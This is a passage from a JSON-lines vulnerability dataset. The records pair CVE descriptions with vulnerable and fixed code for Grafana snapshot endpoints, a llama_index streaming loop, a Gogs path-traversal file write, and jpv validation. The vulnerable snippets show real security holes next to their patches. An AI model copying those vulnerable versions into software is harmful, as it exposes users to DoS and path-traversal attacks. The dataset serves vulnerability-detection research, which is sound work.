\"Failed to delete dashboard snapshot\", err)\n\t}\n\n\treturn response.JSON(200, util.DynMap{\n\t\t\"message\": \"Snapshot deleted. It might take an hour before it's cleared from any CDN caches.\",\n\t\t\"id\": query.Result.Id,\n\t})\n}"}, {"id": "vul_go_138_3", "commit": "c725a42", "file_path": "pkg/api/dashboard_snapshot.go", "start_line": 246, "end_line": 292, "snippet": "func DeleteDashboardSnapshot(c *models.ReqContext) response.Response {\n\tkey := c.Params(\":key\")\n\n\tquery := &models.GetDashboardSnapshotQuery{Key: key}\n\n\terr := bus.Dispatch(query)\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard snapshot\", err)\n\t}\n\tif query.Result == nil {\n\t\treturn response.Error(404, \"Failed to get dashboard snapshot\", nil)\n\t}\n\n\tdashboard, err := query.Result.DashboardJSON()\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard data for dashboard snapshot\", err)\n\t}\n\tdashboardID := dashboard.Get(\"id\").MustInt64()\n\n\tguardian := guardian.New(dashboardID, c.OrgId, c.SignedInUser)\n\tcanEdit, err := guardian.CanEdit()\n\tif err != nil {\n\t\treturn response.Error(500, \"Error while checking permissions for snapshot\", err)\n\t}\n\n\tif !canEdit && query.Result.UserId != c.SignedInUser.UserId {\n\t\treturn response.Error(403, \"Access denied to this snapshot\", nil)\n\t}\n\n\tif query.Result.External {\n\t\terr := deleteExternalDashboardSnapshot(query.Result.ExternalDeleteUrl)\n\t\tif err != nil {\n\t\t\treturn response.Error(500, \"Failed to delete external dashboard\", err)\n\t\t}\n\t}\n\n\tcmd := &models.DeleteDashboardSnapshotCommand{DeleteKey: query.Result.DeleteKey}\n\n\tif err := bus.Dispatch(cmd); err != nil {\n\t\treturn response.Error(500, \"Failed to delete dashboard snapshot\", err)\n\t}\n\n\treturn response.JSON(200, util.DynMap{\n\t\t\"message\": \"Snapshot deleted. It might take an hour before it's cleared from any CDN caches.\",\n\t\t\"id\": query.Result.Id,\n\t})\n}"}, {"id": "vul_go_138_4", "commit": "c725a42", "file_path": "pkg/macaron/router.go", "start_line": 289, "end_line": 309, "snippet": "func (r *Router) ServeHTTP(rw http.ResponseWriter, req *http.Request) {\n\tif t, ok := r.routers[req.Method]; ok {\n\t\t// Fast match for static routes\n\t\tleaf := r.getLeaf(req.Method, req.URL.Path)\n\t\tif leaf != nil {\n\t\t\tleaf.handle(rw, req, nil)\n\t\t\treturn\n\t\t}\n\n\t\th, p, ok := t.Match(req.URL.EscapedPath())\n\t\tif ok {\n\t\t\tif splat, ok := p[\"*0\"]; ok {\n\t\t\t\tp[\"*\"] = splat // Easy name.\n\t\t\t}\n\t\t\th(rw, req, p)\n\t\t\treturn\n\t\t}\n\t}\n\n\tr.notFound(rw, req)\n}"}], "fix_func": [{"id": "fix_go_138_1", "commit": "2d456a6", "file_path": "pkg/api/dashboard_snapshot.go", "start_line": 147, "end_line": 184, "snippet": "func GetDashboardSnapshot(c *models.ReqContext) response.Response {\n\tkey := c.Params(\":key\")\n\tif len(key) == 0 {\n\t\treturn response.Error(404, \"Snapshot not found\", nil)\n\t}\n\tquery := &models.GetDashboardSnapshotQuery{Key: key}\n\n\terr := bus.Dispatch(query)\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard snapshot\", err)\n\t}\n\n\tsnapshot := query.Result\n\n\t// expired snapshots should also be removed from db\n\tif snapshot.Expires.Before(time.Now()) {\n\t\treturn response.Error(404, \"Dashboard snapshot not found\", err)\n\t}\n\n\tdashboard, err := snapshot.DashboardJSON()\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard data for dashboard snapshot\", err)\n\t}\n\n\tdto := dtos.DashboardFullWithMeta{\n\t\tDashboard: dashboard,\n\t\tMeta: dtos.DashboardMeta{\n\t\t\tType: models.DashTypeSnapshot,\n\t\t\tIsSnapshot: true,\n\t\t\tCreated: snapshot.Created,\n\t\t\tExpires: snapshot.Expires,\n\t\t},\n\t}\n\n\tmetrics.MApiDashboardSnapshotGet.Inc()\n\n\treturn response.JSON(200, dto).SetHeader(\"Cache-Control\", \"public, max-age=3600\")\n}"}, {"id": "fix_go_138_2", "commit": "2d456a6", "file_path": "pkg/api/dashboard_snapshot.go", "start_line": 219, "end_line": 249, "snippet": "func DeleteDashboardSnapshotByDeleteKey(c *models.ReqContext) response.Response {\n\tkey := c.Params(\":deleteKey\")\n\tif len(key) == 0 {\n\t\treturn response.Error(404, \"Snapshot not found\", nil)\n\t}\n\n\tquery := &models.GetDashboardSnapshotQuery{DeleteKey: key}\n\n\terr := bus.Dispatch(query)\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard snapshot\", err)\n\t}\n\n\tif query.Result.External {\n\t\terr := deleteExternalDashboardSnapshot(query.Result.ExternalDeleteUrl)\n\t\tif err != nil {\n\t\t\treturn response.Error(500, \"Failed to delete external dashboard\", err)\n\t\t}\n\t}\n\n\tcmd := &models.DeleteDashboardSnapshotCommand{DeleteKey: query.Result.DeleteKey}\n\n\tif err := bus.Dispatch(cmd); err != nil {\n\t\treturn response.Error(500, \"Failed to delete dashboard snapshot\", err)\n\t}\n\n\treturn response.JSON(200, util.DynMap{\n\t\t\"message\": \"Snapshot deleted. It might take an hour before it's cleared from any CDN caches.\",\n\t\t\"id\": query.Result.Id,\n\t})\n}"}, {"id": "fix_go_138_3", "commit": "2d456a6", "file_path": "pkg/api/dashboard_snapshot.go", "start_line": 252, "end_line": 301, "snippet": "func DeleteDashboardSnapshot(c *models.ReqContext) response.Response {\n\tkey := c.Params(\":key\")\n\tif len(key) == 0 {\n\t\treturn response.Error(404, \"Snapshot not found\", nil)\n\t}\n\n\tquery := &models.GetDashboardSnapshotQuery{Key: key}\n\n\terr := bus.Dispatch(query)\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard snapshot\", err)\n\t}\n\tif query.Result == nil {\n\t\treturn response.Error(404, \"Failed to get dashboard snapshot\", nil)\n\t}\n\n\tdashboard, err := query.Result.DashboardJSON()\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard data for dashboard snapshot\", err)\n\t}\n\tdashboardID := dashboard.Get(\"id\").MustInt64()\n\n\tguardian := guardian.New(dashboardID, c.OrgId, c.SignedInUser)\n\tcanEdit, err := guardian.CanEdit()\n\tif err != nil {\n\t\treturn response.Error(500, \"Error while checking permissions for snapshot\", err)\n\t}\n\n\tif !canEdit && query.Result.UserId != c.SignedInUser.UserId {\n\t\treturn response.Error(403, \"Access denied to this snapshot\", nil)\n\t}\n\n\tif query.Result.External {\n\t\terr := deleteExternalDashboardSnapshot(query.Result.ExternalDeleteUrl)\n\t\tif err != nil {\n\t\t\treturn response.Error(500, \"Failed to delete external dashboard\", err)\n\t\t}\n\t}\n\n\tcmd := &models.DeleteDashboardSnapshotCommand{DeleteKey: query.Result.DeleteKey}\n\n\tif err := bus.Dispatch(cmd); err != nil {\n\t\treturn response.Error(500, \"Failed to delete dashboard snapshot\", err)\n\t}\n\n\treturn response.JSON(200, util.DynMap{\n\t\t\"message\": \"Snapshot deleted. It might take an hour before it's cleared from any CDN caches.\",\n\t\t\"id\": query.Result.Id,\n\t})\n}"}, {"id": "fix_go_138_4", "commit": "2d456a6", "file_path": "pkg/macaron/router.go", "start_line": 289, "end_line": 311, "snippet": "func (r *Router) ServeHTTP(rw http.ResponseWriter, req *http.Request) {\n\tif t, ok := r.routers[req.Method]; ok {\n\t\t// Fast match for static routes\n\t\tif !strings.ContainsAny(req.URL.Path, \":*\") {\n\t\t\tleaf := r.getLeaf(req.Method, req.URL.Path)\n\t\t\tif leaf != nil {\n\t\t\t\tleaf.handle(rw, req, nil)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\n\t\th, p, ok := t.Match(req.URL.EscapedPath())\n\t\tif ok {\n\t\t\tif splat, ok := p[\"*0\"]; ok {\n\t\t\t\tp[\"*\"] = splat // Easy name.\n\t\t\t}\n\t\t\th(rw, req, p)\n\t\t\treturn\n\t\t}\n\t}\n\n\tr.notFound(rw, req)\n}"}], "vul_patch": "--- a/pkg/api/dashboard_snapshot.go\n+++ b/pkg/api/dashboard_snapshot.go\n@@ -1,5 +1,8 @@\n func GetDashboardSnapshot(c *models.ReqContext) response.Response {\n \tkey := c.Params(\":key\")\n+\tif len(key) == 0 {\n+\t\treturn response.Error(404, \"Snapshot not found\", nil)\n+\t}\n \tquery := &models.GetDashboardSnapshotQuery{Key: key}\n \n \terr := bus.Dispatch(query)\n\n--- a/pkg/api/dashboard_snapshot.go\n+++ b/pkg/api/dashboard_snapshot.go\n@@ -1,5 +1,8 @@\n func DeleteDashboardSnapshotByDeleteKey(c *models.ReqContext) response.Response {\n \tkey := c.Params(\":deleteKey\")\n+\tif len(key) == 0 {\n+\t\treturn response.Error(404, \"Snapshot not found\", nil)\n+\t}\n \n \tquery := &models.GetDashboardSnapshotQuery{DeleteKey: key}\n \n\n--- a/pkg/api/dashboard_snapshot.go\n+++ b/pkg/api/dashboard_snapshot.go\n@@ -1,5 +1,8 @@\n func DeleteDashboardSnapshot(c *models.ReqContext) response.Response {\n \tkey := c.Params(\":key\")\n+\tif len(key) == 0 {\n+\t\treturn response.Error(404, \"Snapshot not found\", nil)\n+\t}\n \n \tquery := &models.GetDashboardSnapshotQuery{Key: key}\n \n\n--- a/pkg/macaron/router.go\n+++ b/pkg/macaron/router.go\n@@ -1,10 +1,12 @@\n func (r *Router) ServeHTTP(rw http.ResponseWriter, req *http.Request) {\n \tif t, ok := r.routers[req.Method]; ok {\n \t\t// Fast match for static routes\n-\t\tleaf := r.getLeaf(req.Method, req.URL.Path)\n-\t\tif leaf != nil {\n-\t\t\tleaf.handle(rw, req, nil)\n-\t\t\treturn\n+\t\tif !strings.ContainsAny(req.URL.Path, \":*\") {\n+\t\t\tleaf := r.getLeaf(req.Method, req.URL.Path)\n+\t\t\tif leaf != nil {\n+\t\t\t\tleaf.handle(rw, req, nil)\n+\t\t\t\treturn\n+\t\t\t}\n \t\t}\n \n \t\th, p, ok := t.Match(req.URL.EscapedPath())\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-12704", "cve_description": "A vulnerability in the LangChainLLM class of the run-llama/llama_index repository, version v0.12.5, allows for a Denial of Service (DoS) attack. The stream_complete method executes the llm using a thread and retrieves the result via the get_response_gen method of the StreamingGeneratorCallbackHandler class. If the thread terminates abnormally before the _llm.predict is executed, there is no exception handling for this case, leading to an infinite loop in the get_response_gen function. This can be triggered by providing an input of an incorrect type, causing the thread to terminate and the process to continue running indefinitely.", "cwe_info": {"CWE-755": {"name": "Improper Handling of Exceptional Conditions", "description": "The product does not handle or incorrectly handles an exceptional condition."}}, "repo": "https://github.com/run-llama/llama_index", "patch_url": ["https://github.com/run-llama/llama_index/commit/d1ecfb77578d089cbe66728f18f635c09aa32a05"], "programing_language": "Python", "vul_func": [{"id": "vul_py_431_1", "commit": "98fd497", "file_path": "llama-index-core/llama_index/core/langchain_helpers/streaming.py", "start_line": 38, "end_line": 44, "snippet": " def get_response_gen(self) -> Generator:\n while True:\n if not self._token_queue.empty():\n token = self._token_queue.get_nowait()\n yield token\n elif self._done.is_set():\n break"}], "fix_func": [{"id": "fix_py_431_1", "commit": "d1ecfb77578d089cbe66728f18f635c09aa32a05", "file_path": "llama-index-core/llama_index/core/langchain_helpers/streaming.py", "start_line": 39, "end_line": 60, "snippet": " def get_response_gen(self, timeout: float = 120.0) -> Generator:\n \"\"\"Get response generator with timeout.\n\n Args:\n timeout (float): Maximum time in seconds to wait for the complete response.\n Defaults to 120 seconds.\n \"\"\"\n start_time = time.time()\n while True:\n if time.time() - start_time > timeout:\n raise TimeoutError(\n f\"Response generation timed out after {timeout} seconds\"\n )\n\n if not self._token_queue.empty():\n token = self._token_queue.get_nowait()\n yield token\n elif self._done.is_set():\n break\n else:\n # Small sleep to prevent CPU spinning\n time.sleep(0.01)"}], "vul_patch": "--- a/llama-index-core/llama_index/core/langchain_helpers/streaming.py\n+++ b/llama-index-core/llama_index/core/langchain_helpers/streaming.py\n@@ -1,7 +1,22 @@\n- def get_response_gen(self) -> Generator:\n+ def get_response_gen(self, timeout: float = 120.0) -> Generator:\n+ \"\"\"Get response generator with timeout.\n+\n+ Args:\n+ timeout (float): Maximum time in seconds to wait for the complete response.\n+ Defaults to 120 seconds.\n+ \"\"\"\n+ start_time = time.time()\n while True:\n+ if time.time() - start_time > timeout:\n+ raise TimeoutError(\n+ f\"Response generation timed out after {timeout} seconds\"\n+ )\n+\n if not self._token_queue.empty():\n token = self._token_queue.get_nowait()\n yield token\n elif self._done.is_set():\n break\n+ else:\n+ # Small sleep to prevent CPU spinning\n+ time.sleep(0.01)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-55947", "cve_description": "Gogs is an open source self-hosted Git service. A malicious user is able to write a file to an arbitrary path on the server to gain SSH access to the server. The vulnerability is fixed in 0.13.1.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/gogs/gogs", "patch_url": ["https://github.com/gogs/gogs/commit/9a9388ace25bd646f5098cb9193d983332c34e41"], "programing_language": "Go", "vul_func": [{"id": "vul_go_93_1", "commit": "8a3b819", "file_path": "internal/route/api/v1/repo/contents.go", "start_line": "104", "end_line": "171", "snippet": "func GetContents(c *context.APIContext) {\n\trepoPath := repoutil.RepositoryPath(c.Params(\":username\"), c.Params(\":reponame\"))\n\tgitRepo, err := git.Open(repoPath)\n\tif err != nil {\n\t\tc.Error(err, \"open repository\")\n\t\treturn\n\t}\n\n\tref := c.Query(\"ref\")\n\tif ref == \"\" {\n\t\tref = c.Repo.Repository.DefaultBranch\n\t}\n\n\tcommit, err := gitRepo.CatFileCommit(ref)\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"get commit\")\n\t\treturn\n\t}\n\n\ttreePath := c.Params(\"*\")\n\tentry, err := commit.TreeEntry(treePath)\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"get tree entry\")\n\t\treturn\n\t}\n\n\tif !entry.IsTree() {\n\t\tcontent, err := toRepoContent(c, ref, treePath, commit, entry)\n\t\tif err != nil {\n\t\t\tc.Errorf(err, \"convert %q to repoContent\", treePath)\n\t\t\treturn\n\t\t}\n\n\t\tc.JSONSuccess(content)\n\t\treturn\n\t}\n\n\t// The entry is a directory\n\tdir, err := gitRepo.LsTree(entry.ID().String())\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"get tree\")\n\t\treturn\n\t}\n\n\tentries, err := dir.Entries()\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"list entries\")\n\t\treturn\n\t}\n\n\tif len(entries) == 0 {\n\t\tc.JSONSuccess([]string{})\n\t\treturn\n\t}\n\n\tcontents := make([]*repoContent, 0, len(entries))\n\tfor _, entry := range entries {\n\t\tsubpath := path.Join(treePath, entry.Name())\n\t\tcontent, err := toRepoContent(c, ref, subpath, commit, entry)\n\t\tif err != nil {\n\t\t\tc.Errorf(err, \"convert %q to repoContent\", subpath)\n\t\t\treturn\n\t\t}\n\n\t\tcontents = append(contents, content)\n\t}\n\tc.JSONSuccess(contents)\n}"}, {"id": "vul_go_93_2", "commit": "8a3b819", "file_path": "internal/route/api/v1/repo/contents.go", "start_line": "181", "end_line": "246", "snippet": "func PutContents(c *context.APIContext, r PutContentsRequest) {\n\tcontent, err := base64.StdEncoding.DecodeString(r.Content)\n\tif err != nil {\n\t\tc.Error(err, \"decoding base64\")\n\t\treturn\n\t}\n\n\tif r.Branch == \"\" {\n\t\tr.Branch = c.Repo.Repository.DefaultBranch\n\t}\n\ttreePath := c.Params(\"*\")\n\terr = c.Repo.Repository.UpdateRepoFile(\n\t\tc.User,\n\t\tdatabase.UpdateRepoFileOptions{\n\t\t\tOldBranch: c.Repo.Repository.DefaultBranch,\n\t\t\tNewBranch: r.Branch,\n\t\t\tOldTreeName: treePath,\n\t\t\tNewTreeName: treePath,\n\t\t\tMessage: r.Message,\n\t\t\tContent: string(content),\n\t\t},\n\t)\n\tif err != nil {\n\t\tc.Error(err, \"updating repository file\")\n\t\treturn\n\t}\n\n\trepoPath := repoutil.RepositoryPath(c.Params(\":username\"), c.Params(\":reponame\"))\n\tgitRepo, err := git.Open(repoPath)\n\tif err != nil {\n\t\tc.Error(err, \"open repository\")\n\t\treturn\n\t}\n\n\tcommit, err := gitRepo.CatFileCommit(r.Branch)\n\tif err != nil {\n\t\tc.Error(err, \"get file commit\")\n\t\treturn\n\t}\n\n\tentry, err := commit.TreeEntry(treePath)\n\tif err != nil {\n\t\tc.Error(err, \"get tree entry\")\n\t\treturn\n\t}\n\n\tapiContent, err := toRepoContent(c, r.Branch, treePath, commit, entry)\n\tif err != nil {\n\t\tc.Error(err, \"convert to *repoContent\")\n\t\treturn\n\t}\n\n\tapiCommit, err := gitCommitToAPICommit(commit, c)\n\tif err != nil {\n\t\tc.Error(err, \"convert to *api.Commit\")\n\t\treturn\n\t}\n\n\tc.JSON(\n\t\thttp.StatusCreated,\n\t\tmap[string]any{\n\t\t\t\"content\": apiContent,\n\t\t\t\"commit\": apiCommit,\n\t\t},\n\t)\n}"}], "fix_func": [{"id": "fix_go_93_1", "commit": "9a9388a", "file_path": "internal/route/api/v1/repo/contents.go", "start_line": "105", "end_line": "173", "snippet": "func GetContents(c *context.APIContext) {\n\trepoPath := repoutil.RepositoryPath(c.Params(\":username\"), c.Params(\":reponame\"))\n\tgitRepo, err := git.Open(repoPath)\n\tif err != nil {\n\t\tc.Error(err, \"open repository\")\n\t\treturn\n\t}\n\n\tref := c.Query(\"ref\")\n\tif ref == \"\" {\n\t\tref = c.Repo.Repository.DefaultBranch\n\t}\n\n\tcommit, err := gitRepo.CatFileCommit(ref)\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"get commit\")\n\t\treturn\n\t}\n\n\t// \\ud83d\\udea8 SECURITY: Prevent path traversal.\n\ttreePath := pathutil.Clean(c.Params(\"*\"))\n\tentry, err := commit.TreeEntry(treePath)\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"get tree entry\")\n\t\treturn\n\t}\n\n\tif !entry.IsTree() {\n\t\tcontent, err := toRepoContent(c, ref, treePath, commit, entry)\n\t\tif err != nil {\n\t\t\tc.Errorf(err, \"convert %q to repoContent\", treePath)\n\t\t\treturn\n\t\t}\n\n\t\tc.JSONSuccess(content)\n\t\treturn\n\t}\n\n\t// The entry is a directory\n\tdir, err := gitRepo.LsTree(entry.ID().String())\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"get tree\")\n\t\treturn\n\t}\n\n\tentries, err := dir.Entries()\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"list entries\")\n\t\treturn\n\t}\n\n\tif len(entries) == 0 {\n\t\tc.JSONSuccess([]string{})\n\t\treturn\n\t}\n\n\tcontents := make([]*repoContent, 0, len(entries))\n\tfor _, entry := range entries {\n\t\tsubpath := path.Join(treePath, entry.Name())\n\t\tcontent, err := toRepoContent(c, ref, subpath, commit, entry)\n\t\tif err != nil {\n\t\t\tc.Errorf(err, \"convert %q to repoContent\", subpath)\n\t\t\treturn\n\t\t}\n\n\t\tcontents = append(contents, content)\n\t}\n\tc.JSONSuccess(contents)\n}"}, {"id": "fix_go_93_2", "commit": "9a9388a", "file_path": "internal/route/api/v1/repo/contents.go", "start_line": "183", "end_line": "251", "snippet": "func PutContents(c *context.APIContext, r PutContentsRequest) {\n\tcontent, err := base64.StdEncoding.DecodeString(r.Content)\n\tif err != nil {\n\t\tc.Error(err, \"decoding base64\")\n\t\treturn\n\t}\n\n\tif r.Branch == \"\" {\n\t\tr.Branch = c.Repo.Repository.DefaultBranch\n\t}\n\n\t// \\ud83d\\udea8 SECURITY: Prevent path traversal.\n\ttreePath := pathutil.Clean(c.Params(\"*\"))\n\n\terr = c.Repo.Repository.UpdateRepoFile(\n\t\tc.User,\n\t\tdatabase.UpdateRepoFileOptions{\n\t\t\tOldBranch: c.Repo.Repository.DefaultBranch,\n\t\t\tNewBranch: r.Branch,\n\t\t\tOldTreeName: treePath,\n\t\t\tNewTreeName: treePath,\n\t\t\tMessage: r.Message,\n\t\t\tContent: string(content),\n\t\t},\n\t)\n\tif err != nil {\n\t\tc.Error(err, \"updating repository file\")\n\t\treturn\n\t}\n\n\trepoPath := repoutil.RepositoryPath(c.Params(\":username\"), c.Params(\":reponame\"))\n\tgitRepo, err := git.Open(repoPath)\n\tif err != nil {\n\t\tc.Error(err, \"open repository\")\n\t\treturn\n\t}\n\n\tcommit, err := gitRepo.CatFileCommit(r.Branch)\n\tif err != nil {\n\t\tc.Error(err, \"get file commit\")\n\t\treturn\n\t}\n\n\tentry, err := commit.TreeEntry(treePath)\n\tif err != nil {\n\t\tc.Error(err, \"get tree entry\")\n\t\treturn\n\t}\n\n\tapiContent, err := toRepoContent(c, r.Branch, treePath, commit, entry)\n\tif err != nil {\n\t\tc.Error(err, \"convert to *repoContent\")\n\t\treturn\n\t}\n\n\tapiCommit, err := gitCommitToAPICommit(commit, c)\n\tif err != nil {\n\t\tc.Error(err, \"convert to *api.Commit\")\n\t\treturn\n\t}\n\n\tc.JSON(\n\t\thttp.StatusCreated,\n\t\tmap[string]any{\n\t\t\t\"content\": apiContent,\n\t\t\t\"commit\": apiCommit,\n\t\t},\n\t)\n}"}], "vul_patch": "--- a/internal/route/api/v1/repo/contents.go\n+++ b/internal/route/api/v1/repo/contents.go\n@@ -17,7 +17,8 @@\n \t\treturn\n \t}\n \n-\ttreePath := c.Params(\"*\")\n+\t// \\ud83d\\udea8 SECURITY: Prevent path traversal.\n+\ttreePath := pathutil.Clean(c.Params(\"*\"))\n \tentry, err := commit.TreeEntry(treePath)\n \tif err != nil {\n \t\tc.NotFoundOrError(gitutil.NewError(err), \"get tree entry\")\n\n--- a/internal/route/api/v1/repo/contents.go\n+++ b/internal/route/api/v1/repo/contents.go\n@@ -8,7 +8,10 @@\n \tif r.Branch == \"\" {\n \t\tr.Branch = c.Repo.Repository.DefaultBranch\n \t}\n-\ttreePath := c.Params(\"*\")\n+\n+\t// \\ud83d\\udea8 SECURITY: Prevent path traversal.\n+\ttreePath := pathutil.Clean(c.Params(\"*\"))\n+\n \terr = c.Repo.Repository.UpdateRepoFile(\n \t\tc.User,\n \t\tdatabase.UpdateRepoFileOptions{\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-17479", "cve_description": "jpv (aka Json Pattern Validator) before 2.2.2 does not properly validate input, as demonstrated by a corrupted array.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/manvel-khnkoyan/jpv", "patch_url": ["https://github.com/manvel-khnkoyan/jpv/commit/e3eec1215caa8d5c560f5e88d0943422831927d6"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_71_1", "commit": "8a3cb77", "file_path": "index.js", "start_line": 116, "end_line": 285, "snippet": "const compare = (value, pattern, options) => {\n /*\n * Special for debugging\n * */\n const res = (result) => {\n let val = '';\n if (!pattern || ((typeof pattern !== 'object') && (typeof pattern !== 'string') && typeof pattern !== 'function')) {\n val = String(pattern)\n } else if (pattern.constructor === JpvObject) {\n val = `operator \"${pattern.type}\": ${JSON.stringify(pattern.value)}`;\n } else {\n JSON.stringify(pattern)\n }\n\n\n if (typeof pattern === 'function') {\n val = pattern.toString();\n }\n if (!result && options && options.debug) {\n options.logger(`error - the value of: {${options.deepLog.join('.')}: ` +\n `${String(value)}} not matched with: ${val}`);\n }\n return result;\n };\n\n // simple types pattern = number | boolean | symbol | bigint\n if ((typeof pattern === 'number') || (typeof pattern === 'symbol') || (typeof pattern === 'boolean') ||\n (typeof pattern === 'bigint') || (typeof pattern === 'undefined') || (pattern === null)) {\n return res(pattern === value);\n }\n\n /*\n * When pattern is regex\n */\n if (pattern instanceof RegExp) {\n return res(String(value).match(pattern));\n }\n\n // String\n if ((typeof pattern === 'string')) {\n // Native Types\n let nativeMatches = pattern.match(/^(!)?\\((.*)\\)(\\?)?$/i);\n if (nativeMatches !== null) {\n // eslint-disable-next-line valid-typeof\n let match = (typeof value === nativeMatches[2]);\n\n // ------------------------> Deprecated\n // Negation ? Operator\n if (typeof nativeMatches[3] !== 'undefined') {\n depricated('neg');\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n if (nativeMatches[1] === '!') {\n depricated('neg');\n return res(!match);\n }\n // <-------------------------\n\n return res(match);\n }\n\n // Patterns\n let logicalMatches = pattern.match(/^(!)?\\[(.*)\\](\\?)?$/i);\n if (logicalMatches !== null) {\n const valid = comparePattern(value, logicalMatches[2]);\n\n // ------------------------> Deprecated\n // ? Operator\n if (typeof logicalMatches[3] !== 'undefined') {\n depricated('neg');\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n // ! Operator\n if (typeof logicalMatches[1] !== 'undefined') {\n depricated('neg');\n return res(!valid);\n }\n // <-------------------------\n\n return res(valid);\n }\n\n // ------------------------> Deprecated\n // Functional Regex\n let functionalRegexMatches = pattern.match(/^(?!=^|,)(!)?\\{\\/(.*)\\/([a-z]*)\\}(\\?)?$/i);\n if (functionalRegexMatches !== null) {\n depricated('tag');\n let match = (String(value).match(new RegExp(functionalRegexMatches[2], functionalRegexMatches[3])) !== null);\n // Negation ? Operator\n if (typeof functionalRegexMatches[4] !== 'undefined') {\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n return res(functionalRegexMatches[1] === '!' ? !match : match);\n }\n\n // Functional Fixed\n let functionalFixedMatches = pattern.match(/^(!)?\\{(.*)\\}(\\?)?$/i);\n if (functionalFixedMatches !== null) {\n depricated('tag');\n let match = (String(value) === String(functionalFixedMatches[2]));\n // Negation ? Operator\n if (typeof functionalFixedMatches[3] !== 'undefined') {\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n return res(functionalFixedMatches[1] === '!' ? !match : match);\n }\n // <-------------------------\n\n // Fixed String Comparition\n return res(value === pattern);\n }\n\n // Constructor is JpvObject\n if (typeof pattern === 'object' && pattern.constructor === JpvObject) {\n if (pattern.type === 'not') {\n return res(!compare(value, pattern.value, options));\n }\n if (pattern.type === 'and') {\n for (let i = 0; i < pattern.value.length; i++) {\n if (!compare(value, pattern.value[i])) {\n return res(false);\n }\n }\n return true;\n }\n if (pattern.type === 'or') {\n for (let i = 0; i < pattern.value.length; i++) {\n if (compare(value, pattern.value[i])) {\n return true;\n }\n }\n return res(false);\n }\n if (pattern.type === 'exact') {\n return res(value === pattern.value);\n }\n\n if (pattern.type === 'typeOf') {\n // eslint-disable-next-line valid-typeof\n return res(typeof value === pattern.value);\n }\n\n if (pattern.type === 'is') {\n return res(comparePattern(value, pattern.value));\n }\n }\n\n // pattern = object\n if (typeof pattern === 'object') {\n if (value !== null) {\n return res(value.constructor === pattern.constructor);\n }\n return res(value === pattern);\n }\n\n // pattern is a function\n if (typeof pattern === 'function') {\n return res(!!pattern(value));\n }\n\n throw new Error('invalid data type');\n};"}], "fix_func": [{"id": "fix_js_71_1", "commit": "e3eec1215caa8d5c560f5e88d0943422831927d6", "file_path": "index.js", "start_line": 137, "end_line": 309, "snippet": "const compare = (value, pattern, options) => {\n /*\n * Special for debugging\n * */\n const res = (result) => {\n let val = '';\n if (!pattern || ((typeof pattern !== 'object') && (typeof pattern !== 'string') && typeof pattern !== 'function')) {\n val = String(pattern);\n } else if (pattern.constructor === JpvObject) {\n val = `operator \"${pattern.type}\": ${JSON.stringify(pattern.value)}`;\n } else {\n JSON.stringify(pattern);\n }\n\n if (typeof pattern === 'function') {\n val = pattern.toString();\n }\n if (!result && options && options.debug) {\n options.logger(`error - the value of: {${options.deepLog.join('.')}: ` +\n `${String(value)}} not matched with: ${val}`);\n }\n return result;\n };\n\n // simple types pattern = number | boolean | symbol | bigint\n if ((typeof pattern === 'number') || (typeof pattern === 'symbol') || (typeof pattern === 'boolean') ||\n (typeof pattern === 'bigint') || (typeof pattern === 'undefined') || (pattern === null)) {\n return res(pattern === value);\n }\n\n /*\n * When pattern is regex\n */\n if (pattern instanceof RegExp) {\n return res(String(value).match(pattern));\n }\n\n // String\n if ((typeof pattern === 'string')) {\n // Native Types\n let nativeMatches = pattern.match(/^(!)?\\((.*)\\)(\\?)?$/i);\n if (nativeMatches !== null) {\n // eslint-disable-next-line valid-typeof\n let match = (typeof value === nativeMatches[2]);\n\n // ------------------------> Deprecated\n // Negation ? Operator\n if (typeof nativeMatches[3] !== 'undefined') {\n depricated('neg');\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n if (nativeMatches[1] === '!') {\n depricated('neg');\n return res(!match);\n }\n // <-------------------------\n\n return res(match);\n }\n\n // Patterns\n let logicalMatches = pattern.match(/^(!)?\\[(.*)\\](\\?)?$/i);\n if (logicalMatches !== null) {\n const valid = comparePattern(value, logicalMatches[2]);\n\n // ------------------------> Deprecated\n // ? Operator\n if (typeof logicalMatches[3] !== 'undefined') {\n depricated('neg');\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n // ! Operator\n if (typeof logicalMatches[1] !== 'undefined') {\n depricated('neg');\n return res(!valid);\n 